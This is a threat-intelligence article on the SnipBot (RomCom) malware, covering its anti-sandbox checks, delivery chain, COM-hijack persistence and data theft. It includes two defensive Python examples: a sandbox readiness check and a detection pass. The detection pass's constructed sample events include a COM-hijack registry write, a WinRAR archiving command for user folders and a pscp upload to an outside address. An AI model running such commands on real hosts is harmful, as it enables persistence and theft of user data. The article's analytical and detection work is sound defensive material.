New Variant of RomCom Malware, 'SnipBot,' Discovered in Data Theft Attacks

By admin | 2024-09-27 | Malware Attack

A newly identified variant of the RomCom malware, named SnipBot, has been used in attacks that pivot through the victim's network to steal data from compromised systems.

Researchers from Palo Alto Networks' Unit 42 uncovered SnipBot after scrutinizing a dynamic link library (DLL) module associated with its attacks. The latest SnipBot campaigns appear to target diverse sectors, including IT services, legal, and agriculture, focusing on data theft and lateral movement within networks.


Evolution of RomCom

RomCom is a backdoor that has historically been used to deploy Cuba ransomware in several malvertising campaigns and targeted phishing operations. The previous version, which Trend Micro researchers tracked as RomCom 4.0 in late 2023, was designed to be lighter and stealthier while keeping a substantial command set: command execution, file theft, payload delivery, registry modification, and TLS-encrypted command-and-control (C2) communications.

Unit 42 considers SnipBot to be RomCom 5.0. It extends the operator's capabilities with a set of 27 commands, which allow fine-grained control over exfiltration (targeting specific file types or directories), compress stolen data with the 7-Zip archiver, and introduce archive-based payloads to evade detection on the host. SnipBot also obfuscates its control flow with window messages: the code is split into blocks that execute in sequence as the malware posts and handles custom messages, rather than through ordinary branches and calls.

New anti-sandbox checks include hash checks on the executable and process name, and a test that the host looks like a real user's machine: at least 100 entries in the "RecentDocs" registry key and at least 50 subkeys under the "Shell Bags" keys, both of which a freshly provisioned analysis VM is unlikely to have. Notably, SnipBot's main module, "single.dll," is stored encrypted in the Windows Registry and decrypted straight into memory; additional modules such as "keyprov.dll" are decrypted and executed the same way, so the payload never needs to exist as a plaintext file on disk.
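The registry checks above are cheap for a sandbox operator to reproduce. The following script is an added example (not Unit 42's code and not derived from the malware): run inside an analysis VM, it reports whether the host would pass the two thresholds quoted in the text. The registry paths, the counting rule (values under RecentDocs minus the MRUListEx index value, subkeys under BagMRU) and every function name are assumptions made for this example.

```python
"""Sandbox pre-flight for the 'lived-in host' checks described above.

Added example, not code from Unit 42 or from the malware. The thresholds
(100 RecentDocs entries, 50 Shell Bags subkeys) are the ones in the text;
the registry paths, the counting rule and the function names are assumptions.
Run it inside an analysis VM: if it reports FAIL, a sample using this
heuristic would refuse to run there.
"""
import sys

# Assumed registry locations (HKCU-relative) for the two artifacts the text names.
RECENT_DOCS_KEY = r"Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs"
SHELLBAGS_KEY = r"Software\Microsoft\Windows\Shell\BagMRU"

# Thresholds quoted in the text.
MIN_RECENT_DOCS = 100
MIN_SHELLBAG_SUBKEYS = 50


def evaluate(recent_docs, shellbag_subkeys,
             min_docs=MIN_RECENT_DOCS, min_bags=MIN_SHELLBAG_SUBKEYS):
    """Return the list of checks the host fails; an empty list means a sample
    using this heuristic would treat the host as a real user's machine."""
    failures = []
    if recent_docs < min_docs:
        failures.append(f"RecentDocs: {recent_docs} < {min_docs}")
    if shellbag_subkeys < min_bags:
        failures.append(f"ShellBags: {shellbag_subkeys} < {min_bags}")
    return failures


def count_key(hive, subkey):
    """(values, subkeys) under a registry key, or (0, 0) if it is absent. Windows only."""
    import winreg  # only importable on Windows
    try:
        with winreg.OpenKey(hive, subkey) as key:
            n_subkeys, n_values, _ = winreg.QueryInfoKey(key)
            return n_values, n_subkeys
    except OSError:
        return 0, 0


def host_counts():
    """Read the live counts from HKCU; returns None on non-Windows hosts."""
    if sys.platform != "win32":
        return None
    import winreg
    doc_values, _ = count_key(winreg.HKEY_CURRENT_USER, RECENT_DOCS_KEY)
    _, bag_subkeys = count_key(winreg.HKEY_CURRENT_USER, SHELLBAGS_KEY)
    # Assumption: one value in RecentDocs is the MRUListEx ordering index, not a document.
    recent_docs = max(doc_values - 1, 0)
    return recent_docs, bag_subkeys


if __name__ == "__main__":
    counts = host_counts()
    if counts is None:
        sys.exit("Run this on the Windows analysis VM itself.")
    failures = evaluate(*counts)
    print("PASS: host looks lived-in" if not failures else "FAIL: " + "; ".join(failures))
```

If the script reports FAIL, seed the VM with real-looking user activity (opening documents, browsing folders in Explorer) or snapshot a used profile, then re-run it before detonating samples that carry this kind of check.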


Attack Vectors

Unit 42 was able to analyze attack artifacts sourced from VirusTotal submissions, tracing back to the initial infection vector for SnipBot. The typical attack sequence begins with phishing emails that contain links to seemingly benign files, such as PDFs, designed to entice recipients into clicking.

Researchers also documented an older initial vector: a fraudulent Adobe site that prompts the victim to download a "missing font" supposedly required to read an attached PDF. Accepting the prompt triggers a chain of redirects through attacker-controlled domains (e.g., "fastshare[.]click," "docstorage[.]link," and "publicshare[.]link") that ends with a malicious downloader executable served from file-sharing sites such as "temp[.]sh." These downloaders are typically signed with valid code-signing certificates so that they can fetch and execute DLL modules from the C2 server without raising security alerts.

A common technique for loading these payloads is COM hijacking: a per-user CLSID registration that "explorer.exe" resolves in place of the legitimate object, which gets the DLL loaded into Explorer and also gives the malware persistence across reboots. Once a system is compromised, the attackers gather information about the company network and the domain controller, then pull targeted files from the Documents, Downloads, and OneDrive directories.

After this initial data theft, a second reconnaissance phase uses the Sysinternals AD Explorer utility, which can browse and modify Active Directory (AD) databases. Stolen data is archived with WinRAR and then exfiltrated with the PuTTY Secure Copy client (pscp).
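The two paragraphs above describe a chain of living-off-the-land steps (COM hijack persistence, AD Explorer reconnaissance, WinRAR archiving of user data folders, pscp upload) that each look mundane in isolation but are suspicious together. The following detection pass is an added example, not Unit 42's code: it runs over constructed Sysmon-style events (hostnames, SID, CLSID, paths and IP are fabricated placeholders; field names mirror Sysmon EventID 1 ProcessCreate and EventID 13 RegistryEvent ValueSet but are flattened to one line per event) and escalates a host only when enough stages of the chain appear on it. All rule names and thresholds are choices made for this example.

```python
"""Detection pass over constructed Sysmon-style events for the post-compromise
chain described above: COM hijack persistence, AD Explorer reconnaissance,
WinRAR archiving of user data folders, and pscp exfiltration.

Added example, not Unit 42's code. The events are constructed for this
example; field names mirror Sysmon EventID 1 and 13 but are simplified.
"""
import re

# Constructed sample events: host|EventID|Field=Value;Field=Value
SAMPLE_EVENTS = """\
WS01|1|Image=C:\\Windows\\explorer.exe;CommandLine=explorer.exe
WS01|13|Image=C:\\Users\\alice\\AppData\\Local\\Temp\\fontfix.exe;TargetObject=HKU\\S-1-5-21-1111\\Software\\Classes\\CLSID\\{11111111-2222-3333-4444-555555555555}\\InprocServer32\\(Default);Details=C:\\Users\\alice\\AppData\\Roaming\\fontpack.dll
WS01|1|Image=C:\\Users\\alice\\Downloads\\ADExplorer64.exe;CommandLine=ADExplorer64.exe
WS01|1|Image=C:\\Program Files\\WinRAR\\Rar.exe;CommandLine=Rar.exe a -r C:\\Users\\alice\\AppData\\Local\\Temp\\out.rar C:\\Users\\alice\\Documents C:\\Users\\alice\\OneDrive
WS01|1|Image=C:\\Users\\alice\\AppData\\Local\\Temp\\pscp.exe;CommandLine=pscp.exe -pw hunter2 C:\\Users\\alice\\AppData\\Local\\Temp\\out.rar backup@203.0.113.10:/srv/in/
WS02|1|Image=C:\\Program Files\\WinRAR\\WinRAR.exe;CommandLine=WinRAR.exe x C:\\Users\\bob\\Downloads\\report.rar
WS02|1|Image=C:\\Program Files\\PuTTY\\pscp.exe;CommandLine=pscp.exe -ls bob@fileserver.corp.example:/home/bob
"""

# Sysmon writes HKCU as HKU\<SID>; a CLSID InprocServer32 under it shadows the HKLM entry.
COM_HIJACK_RE = re.compile(
    r"^HKU\\S-1-5-21-[\d-]+\\Software\\Classes\\CLSID\\\{[0-9A-Fa-f-]+\}\\InprocServer32",
    re.IGNORECASE,
)
# A drive-letter path followed by user@host: is the shape of an upload, not a listing.
PSCP_UPLOAD_RE = re.compile(r"[A-Za-z]:\\\S+\s+\S+@[^\s:]+:")
USER_DATA_DIRS = ("\\documents", "\\downloads", "\\onedrive")
AD_EXPLORER = {"adexplorer.exe", "adexplorer64.exe"}
ARCHIVERS = {"rar.exe", "winrar.exe"}


def parse_event(line):
    host, event_id, rest = line.split("|", 2)
    fields = dict(kv.split("=", 1) for kv in rest.split(";"))
    return {"host": host, "event_id": int(event_id), "fields": fields}


def image_name(ev):
    return ev["fields"].get("Image", "").rsplit("\\", 1)[-1].lower()


def classify(ev):
    """Map one event to a stage of the chain, or None if it matches nothing."""
    f = ev["fields"]
    name = image_name(ev)
    cmd = f.get("CommandLine", "")
    if ev["event_id"] == 13 and COM_HIJACK_RE.match(f.get("TargetObject", "")):
        # Legitimate software also registers per-user CLSIDs, so on its own
        # this is a lead to triage, not a verdict.
        return "com_hijack_persistence"
    if ev["event_id"] != 1:
        return None
    if name in AD_EXPLORER:
        return "ad_recon"
    tokens = cmd.split()
    if (name in ARCHIVERS and len(tokens) > 1 and tokens[1].lower() == "a"
            and any(d in cmd.lower() for d in USER_DATA_DIRS)):
        return "archive_user_data"  # 'a' = add to archive; extraction is ignored
    if name == "pscp.exe" and PSCP_UPLOAD_RE.search(cmd):
        return "pscp_exfil"
    return None


def detect(text):
    """Return {host: [stages in the order first seen]} for hosts with any hit."""
    hits = {}
    for line in text.splitlines():
        if not line.strip():
            continue
        ev = parse_event(line)
        stage = classify(ev)
        if stage and stage not in hits.setdefault(ev["host"], []):
            hits[ev["host"]].append(stage)
    return hits


def flagged_hosts(hits, min_stages=3):
    """Hosts showing enough of the chain to escalate to incident response."""
    return sorted(h for h, stages in hits.items() if len(stages) >= min_stages)


if __name__ == "__main__":
    found = detect(SAMPLE_EVENTS)
    for host, stages in found.items():
        print(host, "->", ", ".join(stages))
    print("escalate:", flagged_hosts(found))
```

WS02 shows why the rules are shaped the way they are: extracting an archive and listing a remote directory with pscp are ordinary administrator activity and produce no hits, while WS01 trips four stages and is escalated. In production the per-user CLSID rule in particular needs an allow-list of known software that registers per-user COM objects.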

While the specific motivations behind the SnipBot and RomCom attacks remain ambiguous, Unit 42 suspects a shift in the threat actor's objectives from financial gain to potential espionage operations, given the range of targeted victims.